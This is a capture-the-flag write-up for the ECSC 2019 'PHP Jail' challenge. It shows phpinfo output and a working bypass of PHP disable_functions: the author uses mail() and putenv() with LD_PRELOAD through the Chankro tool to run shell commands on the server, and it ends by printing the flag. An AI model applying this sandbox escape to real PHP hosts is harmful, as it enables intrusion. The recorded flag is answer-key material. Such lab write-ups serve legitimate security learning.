ECSC 2019 - PHP Jail
13 May 2019description: Saurez-vous sortir de cette prison PHP pour retrouver le fichier flag présent sur le système ?
category: misc - 288
The challenge is giving us a command to interact with the service: nc challenges.ecsc-teamfrance.fr 4002.
# nc challenges.ecsc-teamfrance.fr 4002
/// PHP JAIL ////
There's a file named flag on this filesystem.
Find it.
Read it.
Flag it.
Enter your command:
Too slow!
Bye!We can execute a php command and it will be executed. Let’s see the phpinfo (I deleted useless lines):
# python -c "print 'phpinfo();'" | nc challenges.ecsc-teamfrance.fr 4002
[...]
disable_functions => system, exec, shell_exec, passthru, show_source, popen, proc_open, fopen_with_path, dbmopen, dbase_open, move_uploaded_file, chdir, mkdir, rmdir, rename, filepro, filepro_rowcount, filepro_retrieve, posix_mkfifo, fopen, fread, file_get_contents, readfile, opendir, readdir, scandir, glob, file, dir, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, virtual, openlog, closelog, ini_set, ini_restore, ignore_user_abort, link, pcntl_alarm, pcntl_exec, pcntl_fork, pcntl_get_last_error, pcntl_getpriority, pcntl_setpriority, pcntl_signal, pcntl_signal_dispatch, pcntl_sigprocmask, pcntl_sigtimedwait, pcntl_sigwaitinfo, pcntl_strerror, pcntl_wait, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, is_dir => system, exec, shell_exec, passthru, show_source, popen, proc_open, fopen_with_path, dbmopen, dbase_open, move_uploaded_file, chdir, mkdir, rmdir, rename, filepro, filepro_rowcount, filepro_retrieve, posix_mkfifo, fopen, fread, file_get_contents, readfile, opendir, readdir, scandir, glob, file, dir, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, virtual, openlog, closelog, ini_set, ini_restore, ignore_user_abort, link, pcntl_alarm, pcntl_exec, pcntl_fork, pcntl_get_last_error, pcntl_getpriority, pcntl_setpriority, pcntl_signal, pcntl_signal_dispatch, pcntl_sigprocmask, pcntl_sigtimedwait, pcntl_sigwaitinfo, pcntl_strerror, pcntl_wait, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, is_dir
[...]Ofc we can’t use system, shell_exec, etc…
But mail() and putenv() are enabled so we can execute a command using LD_PRELOAD because mail() is calling execve().
To understand clearly you can read this post
So we will use this github tool
# cat rev.sh
#!/bin/sh
find / -name flag# python chankro.py --arch 64 --input rev.sh --output chan.php --path /tmp
-=[ Chankro ]=-
-={ @TheXC3LL }=-
[+] Binary file: rev.sh
[+] Architecture: x64
[+] Final PHP: chan.php
[+] File created!Then I modify the file so the payload is stored on 1 line (the line must end with an \n else the command won’t be executed) and we send it using nc:
# cat chan.php | nc challenges.ecsc-teamfrance.fr 4002
/// PHP JAIL ////
There's a file named flag on this filesystem.
Find it.
Read it.
Flag it.
Enter your command: /home/user0/.sensitive/randomdir/flag
/usr/local/lib/python2.7/dist-packages/pwnlib/flag
Bye!Nice, all we have to do is to change rev.sh, regenerate the chan.php file and send it to the serveur:
# cat rev.sh
#!/bin/sh
cat /home/user0/.sensitive/randomdir/flag
# python chankro.py --arch 64 --input rev.sh --output chan.php --path /tmp
-=[ Chankro ]=-
-={ @TheXC3LL }=-
[+] Binary file: rev.sh
[+] Architecture: x64
[+] Final PHP: chan.php
[+] File created!
// Modify chan.php so the payload is stored on 1 line and ending with '\n'
# cat chan.php | nc challenges.ecsc-teamfrance.fr 4002
/// PHP JAIL ////
There's a file named flag on this filesystem.
Find it.
Read it.
Flag it.
Enter your command: ECSC{22b1843abfd76008ce3683e583c66e85c6bbdc65}
Bye!The flag is ECSC{22b1843abfd76008ce3683e583c66e85c6bbdc65}
